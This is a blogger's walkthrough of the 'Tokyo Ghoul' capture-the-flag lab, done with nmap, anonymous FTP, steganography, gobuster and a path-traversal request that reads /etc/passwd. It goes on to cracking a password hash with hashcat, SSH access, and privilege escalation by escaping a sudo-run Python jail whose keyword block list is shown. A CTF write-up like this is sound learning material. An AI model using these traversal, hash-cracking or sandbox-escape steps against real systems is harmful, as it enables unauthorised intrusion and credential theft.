Started scanning with nmap.
This was returned almost immediately, so here we get the answers for the 2 first questions.
And as we can see we got 21, 22 and 80 open. And FTP has anonymous login enabled.
┌──(ruant㉿kali)-[~/thm/tokyoghoul666] └─$ sudo nmap -v -oA nmap/all -sV -sC 10.10.2.203 Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-17 21:21 CET NSE: Loaded 153 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 21:21 Completed NSE at 21:21, 0.00s elapsed Initiating NSE at 21:21 Completed NSE at 21:21, 0.00s elapsed Initiating NSE at 21:21 Completed NSE at 21:21, 0.00s elapsed Initiating Ping Scan at 21:21 Scanning 10.10.2.203 [4 ports] Completed Ping Scan at 21:21, 0.13s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 21:21 Completed Parallel DNS resolution of 1 host. at 21:21, 0.02s elapsed Initiating SYN Stealth Scan at 21:21 Scanning 10.10.2.203 [1000 ports] Discovered open port 21/tcp on 10.10.2.203 Discovered open port 22/tcp on 10.10.2.203 Discovered open port 80/tcp on 10.10.2.203 Completed SYN Stealth Scan at 21:21, 3.41s elapsed (1000 total ports) Initiating Service scan at 21:21 Scanning 3 services on 10.10.2.203 Completed Service scan at 21:21, 6.14s elapsed (3 services on 1 host) NSE: Script scanning 10.10.2.203. Initiating NSE at 21:21 NSE: [ftp-bounce] PORT response: 500 Illegal PORT command. Completed NSE at 21:21, 2.16s elapsed Initiating NSE at 21:21 Completed NSE at 21:21, 0.39s elapsed Initiating NSE at 21:21 Completed NSE at 21:21, 0.00s elapsed Nmap scan report for 10.10.2.203 Host is up (0.079s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_drwxr-xr-x 3 ftp ftp 4096 Jan 23 22:26 need_Help? | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.8.173.206 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 fa:9e:38:d3:95:df:55:ea:14:c9:49:d8:0a:61:db:5e (RSA) | 256 ad:b7:a7:5e:36:cb:32:a0:90:90:8e:0b:98:30:8a:97 (ECDSA) |_ 256 a2:a2:c8:14:96:c5:20:68:85:e5:41:d0:aa:53:8b:bd (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Welcome To Tokyo goul Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel NSE: Script Post-scanning. Initiating NSE at 21:21 Completed NSE at 21:21, 0.00s elapsed Initiating NSE at 21:21 Completed NSE at 21:21, 0.00s elapsed Initiating NSE at 21:21 Completed NSE at 21:21, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.87 seconds Raw packets sent: 1043 (45.868KB) | Rcvd: 1001 (40.040KB)
“How many ports are open ?”
“What is the OS used ?”
Jumped over to the web page to check that out.
Here we find a “hidden” message as a HTML comment if we view the source. It’s actually present on both index.html and jasonroom.html.
“Did you find the note that the others ghouls gave you? where did you find it ?”
This hints us to head over to the FTP to get further in our journey.
On the FTP server we find 3 files.
┌──(ruant㉿kali)-[~/thm/tokyoghoul666/ftp] └─$ ftp 10.10.2.203 Connected to 10.10.2.203. 220 (vsFTPd 3.0.3) Name (10.10.2.203:ruant): anonymous 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 3 ftp ftp 4096 Jan 23 22:26 need_Help? 226 Directory send OK. ftp> cd need_Help? 250 Directory successfully changed. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-r--r-- 1 ftp ftp 480 Jan 23 22:26 Aogiri_tree.txt drwxr-xr-x 2 ftp ftp 4096 Jan 23 22:26 Talk_with_me 226 Directory send OK. ftp> cd Talk_with_me 250 Directory successfully changed. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rwxr-xr-x 1 ftp ftp 17488 Jan 23 22:26 need_to_talk -rw-r--r-- 1 ftp ftp 46674 Jan 23 22:26 rize_and_kaneki.jpg 226 Directory send OK. ftp> mget * mget need_to_talk? y 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for need_to_talk (17488 bytes). 226 Transfer complete. 17488 bytes received in 0.05 secs (339.5996 kB/s) mget rize_and_kaneki.jpg? 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for rize_and_kaneki.jpg (46674 bytes). 226 Transfer complete. 46674 bytes received in 0.10 secs (460.6980 kB/s) ftp> quit 221 Goodbye.
We see a text file, a binary executable and a jpg file.
Running the binary we see it’s asking for a password.
┌──(ruant㉿kali)-[~/thm/tokyoghoul666/ftp] └─$ ./need_to_talk Hey Kaneki finnaly you want to talk Unfortunately before I can give you the kagune you need to give me the paraphrase Do you have what I'm looking for? >
Running strings on the binary we can see some clearly defined strings that might be the answer.
And yes it is.
┌──(ruant㉿kali)-[~/thm/tokyoghoul666/ftp] └─$ ./need_to_talk Hey Kaneki finnaly you want to talk Unfortunately before I can give you the kagune you need to give me the paraphrase Do you have what I'm looking for? > kamishiro Good job. I believe this is what you came for: You_found_1t
“What is the key for Rize executable?”
We can actually see the output we get in the strings output too, but let’s note this done,
You_found_1t, because we need it later 👍
(Sidenote 1, the first time doing this I wasn’t able to download the jpg and binary file.. I tried restarting the box several times without any luck. So I did this on the Attack-Box on THM. Not sure what’s up with my VM)
Now, what the next thing.. The image file!
steghide extract -sf rize_and_kaneki.jpg we’re prompted for a password, let’s try the output we got from the binary.
┌──(ruant㉿kali)-[~/thm/tokyoghoul666/ftp] └─$ steghide extract -sf rize_and_kaneki.jpg Enter passphrase: wrote extracted data to "yougotme.txt". ┌──(ruant㉿kali)-[~/thm/tokyoghoul666/ftp] └─$ cat yougotme.txt haha you are so smart kaneki but can you talk my code ..... .- ....- ....- ....- -.... --... ----. ....- -.. ...-- ..--- ....- -.. ...-- ...-- ....- -.. ....- ---.. ....- .- ...-- ..... ..... ---.. ...-- ..--- ....- . -.... -.-. -.... ..--- -.... . ..... ..--- -.... -.-. -.... ...-- -.... --... ...-- -.. ...-- -.. if you can talk it allright you got my secret directory
Perfect, looks like some morse code.. Let’s just chuck it into CyberChef and see what we can figure out.
I tend to just throw “Magic” on it and see what pops out first.
Boom! We get something here, something 1337!
“What the message mean did you understand it ? what it says?”
Back to the webpage!
Surfing to the subdirectory on the website we get a site saying:
Scan me scan me scan all my ideas aaaaahhhhhhhh
So the plan is to search for more subdirectories I guess. gobuster it is!
┌──(ruant㉿kali)-[~/thm/tokyoghoul666/ftp] └─$ gobuster dir -w /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt -u http://10.10.2.203/d1r3c70ry_center/ =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.2.203/d1r3c70ry_center/ [+] Threads: 10 [+] Wordlist: /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2021/03/17 21:50:01 Starting gobuster =============================================================== /claim (Status: 301) Progress: 8491 / 56164 (15.12%)
We got one!
Let’s check out that on the website!
Here we see that the file we’re on is a php file.
There is a “yes / no” question links that has some kinda file inclusion!
We can probably read file from the box with this 🔎
After a bit of tinkering with url encoding we finally managed to get
/etc/passwd read out.
(Sidenote 2, I tried for ever to get this done from my Kali VM again, but there must have been something really f#%!!ck up with it, because it wouldn’t do anything, using the Attack-Box to the rescue again. It also worked from my Kali VM after I rebooted the VM, resetting the THM box didn’t help. I HAVE TO INSTALL A FRESH KALI VM FOR SURE!)
I used burpsuite to craft the request.
GET /d1r3c70ry_center/claim/index.php?view=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1 Host: 10.10.2.203 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://10.10.2.203/d1r3c70ry_center/claim/ Cookie: PHPSESSID=v2ujj7l5vdb9aa85sbsl1ag7l0 Upgrade-Insecure-Requests: 1
<html> <head> <link href="https://fonts.googleapis.com/css?family=IBM+Plex+Sans" rel="stylesheet" /> <link rel="stylesheet" type="text/css" href="style.css" /> </head> <body> <div class="menu"> <a href="index.php">Main Page</a> <a href="index.php?view=flower.gif">NO</a> <a href="index.php?view=flower.gif">YES</a> </div> <p> root❌0:0:root:/root:/bin/bash daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin bin❌2:2:bin:/bin:/usr/sbin/nologin sys❌3:3:sys:/dev:/usr/sbin/nologin sync❌4:65534:sync:/bin:/bin/sync games❌5:60:games:/usr/games:/usr/sbin/nologin man❌6:12:man:/var/cache/man:/usr/sbin/nologin lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail❌8:8:mail:/var/mail:/usr/sbin/nologin news❌9:9:news:/var/spool/news:/usr/sbin/nologin uucp❌10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy❌13:13:proxy:/bin:/usr/sbin/nologin www-data❌33:33:www-data:/var/www:/usr/sbin/nologin backup❌34:34:backup:/var/backups:/usr/sbin/nologin list❌38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc❌39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats❌41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody❌65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync❌100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network❌101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve❌102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy❌103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog❌104:108::/home/syslog:/bin/false _apt❌105:65534::/nonexistent:/bin/false lxd❌106:65534::/var/lib/lxd/:/bin/false messagebus❌107:111::/var/run/dbus:/bin/false uuidd❌108:112::/run/uuidd:/bin/false dnsmasq❌109:65534:dnsmasq,,,:/var/lib/misc:/bin/false statd❌110:65534::/var/lib/nfs:/bin/false sshd❌111:65534::/var/run/sshd:/usr/sbin/nologin vagrant❌1000:1000:vagrant,,,:/home/vagrant:/bin/bash vboxadd❌999:1::/var/run/vboxadd:/bin/false ftp❌112:118:ftp daemon,,,:/srv/ftp:/bin/false kamishiro:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:1001:1001:,,,:/home/kamishiro:/bin/bash </p> </body> </html>
“what is rize username ?”
As you can see, there is a hash in this passwd file too, how nice!
Let’s fire up hashcat and crack it!
./hashcat -m 1800 tokyo_hash.txt rockyou.txt
“what is rize password ?”
Shell on the box!
Since we now have a username and password, let’s try to log on through ssh which we saw was open from our nmap scan.
┌──(ruant㉿kali)-[~/thm/tokyoghoul666] └─$ ssh firstname.lastname@example.org The authenticity of host '10.10.136.127 (10.10.136.127)' can't be established. ECDSA key fingerprint is SHA256:wC2+hZ3E/vA2oWXiu0iRsS4Pd4CZzKotH1IoO2QEU4Q. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.136.127' (ECDSA) to the list of known hosts. email@example.com's password: Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-197-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage This system is built by the Bento project by Chef Software More information can be found at https://github.com/chef/bento The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sat Jan 23 22:29:38 2021 from 192.168.77.1 kamishiro@vagrant:~$ ls jail.py user.txt kamishiro@vagrant:~$ cat user.txt e6215e25c0783eb4279693d9f073594a
Not let’s roam around and see how we can privesc to root on this system 😊
I connected twice through ssh, and ran linpeas in the background while I manually checked out the jail.py file that was located in the home directory of
kamishiro@vagrant:~$ cat jail.py #! /usr/bin/python3 #-*- coding:utf-8 -*- def main(): print("Hi! Welcome to my world kaneki") print("========================================================================") print("What ? You gonna stand like a chicken ? fight me Kaneki") text = input('>>> ') for keyword in ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']: if keyword in text: print("Do you think i will let you do this ??????") return; else: exec(text) print('No Kaneki you are so dead') if __name__ == "__main__": main()
sudo -l we can see that we can run this file as root! This must be the way to privesc!.
kamishiro@vagrant:~$ sudo -l [sudo] password for kamishiro: Matching Defaults entries for kamishiro on vagrant.vm: env_reset, exempt_group=sudo, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User kamishiro may run the following commands on vagrant.vm: (ALL) /usr/bin/python3 /home/kamishiro/jail.py kamishiro@vagrant:~$
So we need to escape this python jail somehow..
After a lot of trial and error. I finally stumbled upon the blog post that most likely is the source where the create of the room found the python script.
With the help from here I do gain some knowledge about how to do this.
The solution was:
But this didn’t come easy… since i totally brain farted for about an half hour, using arrow key up and enter to run the script again… I some how ended up with an earlier version where I didn’t have sudo in front. EPIC FAIL 🤦♂️🤦♂️🤦♂️🤦♂️
And that’s it!
Perfect box, I learned a lot regarding builtin python stuff which I didn’t know before.
I did have some issues along the way, but that was my crappy Kali VM. Which is going in the bin now that I’m done writing this.
Thanks for the room devalfo/0_n05/0UR4N05